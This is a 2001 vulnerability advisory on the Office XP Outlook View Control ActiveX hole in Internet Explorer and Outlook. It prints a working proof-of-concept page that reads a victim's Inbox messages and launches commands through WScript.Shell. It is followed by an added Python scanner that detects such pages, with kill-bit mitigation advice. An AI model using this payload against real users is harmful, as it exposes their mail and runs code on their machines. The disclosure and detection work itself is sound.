Systems affected: Win2K + IE 5.5 SP1 fully patched + Office XP.
It was reported to work with IE6 beta also.
Risk: High
Date: 12 July 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission.
Disclaimer:
The information in this advisory is believed to be true based on experiments though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.
If you want to link to this advisory or reference it use the URL:
http://www.guninski.com/vv2xp.html
The above especially applies for companies like Mitre and BugNet.
Background:
Recently I bought Office XP. It was quite an unpleasant feeling giving so much money for such a buggy product.
Description:
If a user visits a specially designed HTML page with IE, or opens or previews a message with Outlook XP, arbitrary commands may be executed on his computer. This may lead to an attacker taking full control over the user's computer. Another approach to this bug allows reading, modifying and deleting messages in the user's Outlook XP folders.
Details:
The problem is again ActiveX. This time Office XP seems to install a malicious ActiveX control, "Microsoft Outlook View Control". This control exposes a property named "selection" which gives script on the page access to the user's mail messages. It also exposes the Outlook "Application" object, which may lead to execution of arbitrary programs on the user's computer. Examine the script below for more information.
Demonstration:
http://www.guninski.com/vv3-2demo.html
-----------------------------------------------------
This assumes you have at least one message in Outlook XP's Inbox.
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
// Runs 2 seconds after load, once the control has bound to the Inbox folder.
function f()
{
//alert(o2.object);
// "selection" hands the script the items of the folder the control shows.
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
// The Outlook Application object, reached through Session, can create arbitrary COM objects.
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\");
}
setTimeout("f()",2000);
</script>
-----------------------------------------------------
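The following is an added detection example, not part of the advisory and not Georgi Guninski's code. It scans an HTML page or HTML mail body for an <object> tag that instantiates the Outlook View Control (the CLSID is the one used in the demo above) and, only when the control is embedded, checks the page's script for the members the advisory shows being abused ("selection", "Session.Application", CreateObject, WScript.Shell). The member list and the sample pages are my own constructed choices; a mail gateway or proxy filter could run scan_html over message bodies.

```python
# Added example (not from the advisory): flag HTML that embeds the Outlook View
# Control and scripts against the members the advisory describes.
from html.parser import HTMLParser

# CLSID taken from the advisory's demonstration page.
OUTLOOK_VIEW_CONTROL_CLSID = "0006F063-0000-0000-C000-000000000046"

# Members the advisory shows being reached from the control (list chosen here,
# not from the advisory). They are checked only when the control is actually
# embedded, so ordinary pages using e.g. document.selection are not flagged.
SUSPICIOUS_MEMBERS = (".selection", ".Session.Application", "CreateObject(", "WScript.Shell")


class _ObjectScriptCollector(HTMLParser):
    """Collect classid attributes of <object> tags and the text of <script> blocks."""

    def __init__(self):
        super().__init__()
        self.classids = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            self.classids.extend(v for k, v in attrs if k == "classid" and v)
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands script bodies to handle_data, possibly in several chunks.
        if self._in_script:
            self.scripts[-1] += data


def normalize_clsid(value):
    """'clsid:{0006f063-...}' -> '0006F063-...' so spelling variants compare equal."""
    v = value.strip()
    if v[:6].lower() == "clsid:":
        v = v[6:]
    return v.strip().strip("{}").upper()


def scan_html(html):
    """Return a list of findings; an empty list means the control is not embedded."""
    collector = _ObjectScriptCollector()
    collector.feed(html)
    collector.close()
    embeds = [c for c in collector.classids if normalize_clsid(c) == OUTLOOK_VIEW_CONTROL_CLSID]
    if not embeds:
        return []
    findings = ["embeds Outlook View Control (%d object tag(s))" % len(embeds)]
    script_text = "\n".join(collector.scripts)
    findings.extend("script references " + m for m in SUSPICIOUS_MEMBERS if m in script_text)
    return findings


# Constructed samples. DEMO_PAGE mirrors the shape of the advisory's demo page.
DEMO_PAGE = """<html><body>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
sel=o1.object.selection;
vv1=sel.Item(1);
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
}
setTimeout("f()",2000);
</script>
</body></html>"""

# Same control, lower-case braced classid spelling, script only reads the folder.
BRACED_PAGE = """<html><body>
<object id="o1" classid="clsid:{0006f063-0000-0000-c000-000000000046}"></object>
<script>var sel = o1.object.selection;</script>
</body></html>"""

# Placeholder (null) CLSID and an unrelated use of ".selection": must not be flagged.
BENIGN_PAGE = """<html><body>
<object id="other" classid="clsid:{00000000-0000-0000-0000-000000000000}"></object>
<script>var s = document.selection;</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("demo", DEMO_PAGE), ("braced", BRACED_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_html(page) or "clean")
```

This catches only the static form shown in the advisory (a literal classid attribute and plain script); it is a triage signal for message bodies, not a complete filter. The matching host-side mitigation is to prevent IE from instantiating the control at all by setting its kill bit, i.e. the "Compatibility Flags" DWORD value 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} for the CLSID above.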
Solution:
Uninstall Office XP and Windows.
Vendor status:
Microsoft was informed on 9 July 2001. As far as I could understand, they are still investigating my report.
Credits
Regards,
Georgi Guninski
http://www.guninski.com